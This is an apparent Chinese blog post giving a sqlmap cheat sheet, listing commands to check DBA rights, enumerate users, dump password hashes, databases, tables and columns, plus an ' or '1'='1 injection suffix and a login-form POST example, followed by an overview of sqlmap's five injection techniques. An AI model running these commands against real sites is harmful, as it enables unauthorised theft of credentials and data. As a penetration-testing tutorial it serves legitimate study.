• SQLmap


    SQLmap常用语法:

    1.判断当前用户是否是dba(数据库管理员):
    python sqlmap.py -u "url" --is-dba

    2.--users:列出数据库管理系统用户:
    python sqlmap.py -u "url" --users

    3.--passwords:数据库用户密码(hash)
    python sqlmap.py -u "url" --passwords
    python sqlmap.py -u "url" --passwords -U sa

    4.查看用户权限
    python sqlmap.py -u "url" --privileges
    python sqlmap.py -u "url" --privileges -U postgres

    5.--dbs可以利用的数据库
    python sqlmap.py -u "url" --dbs

    6.--tables列数据库表
    python sqlmap.py -u "url" --tables -D "db_name"
    -D:指定数据库名称

    7.--columns查看列名
    python sqlmap.py -u "url" --columns -T "table_name" -D "db_name"

    8.--dump -C "column1_name,column2_name,column3_name" 查询字段数据
    python sqlmap.py -u "url" --dump -C "column1_name,column2_name" -T "table_name" -D "db_name"

    --prefix "'" --suffix " or  '1'='1 -- "

    sqlmap -u "sssslog.asp" --data "user_id=eee&password=eee&Submit=%B5%C7+%C2%BC"

    当给sqlmap这么一个url的时候,它会:

    1 、判断可注入的参数
    2 、判断可以用那种SQL 注入技术来注入
    3 、识别出哪种数据库
    4、根据用户选择, 读取哪些数据

    sqlmap支持五种不同的注入模式:

    1 、基于布尔的盲注, 即可以根据返回页面判断条件真假的注入:
    2 、基于时间的盲注, 即不能根据页面返回内容判断任何信昷, 用条件语句查看时间延迟语句是否执行( 即页面返回时间是否增加〕来判断:
    3 、基于报错注入, 即页面会返回错误信昷, 或者把注入的语句的结果亘接返回在页面中:
    4、 联合查询注入, 可以亻吏用union 的情况下的注入:
    5 、堆查询注入, 可以同时执行多条语句的执行时的注入:

    以下是我在网上找到的关于sqlmap写的比较好的文章:

    http://www.91ri.org/6775.html

    https://www.freebuf.com/sectool/179035.html

  • 相关阅读:
    77. Combinations (Recursion)
    90. Subsets II (Back-Track, DP)
    78. Subsets (Back-Track, DP)
    131. Palindrome Partitioning (Back-Track, DP)
    41. First Missing Positive (HashTable)
    49. Group Anagrams (string, HashTable)
    76. Minimum Window Substring (String, Map)
    Leetcode Intersection of Two Linked Lists
    Cocos2d-js 开发记录:基本图形绘制
    Cocos2d-js 开发记录:骨骼动画载入
  • 原文地址:https://www.cnblogs.com/52kj/p/12430519.html
Copyright © 2020-2023  润新知